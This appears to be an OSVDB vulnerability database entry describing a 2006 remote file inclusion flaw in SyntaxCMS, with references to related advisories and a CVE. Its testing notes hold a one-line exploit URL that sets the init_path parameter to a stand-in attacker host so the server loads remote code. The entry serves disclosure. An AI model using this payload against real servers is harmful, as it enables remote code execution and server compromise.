SyntaxCMS 0004_init_urls.php init_path Variable Remote File Inclusion

2006-09-24T14:03:55
ID OSVDB:29124
Type osvdb
Reporter OSVDB
Modified 2006-09-24T14:03:55

Description

Manual Testing Notes

http://[target]/admin/testing/tests/0004_init_urls.php?init_path=http://[attacker]?&

References:

Secunia Advisory ID:22067 Mail List Post: http://archives.neohapsis.com/archives/fulldisclosure/2006-09/0433.html FrSIRT Advisory: ADV-2006-3760 CVE-2006-5055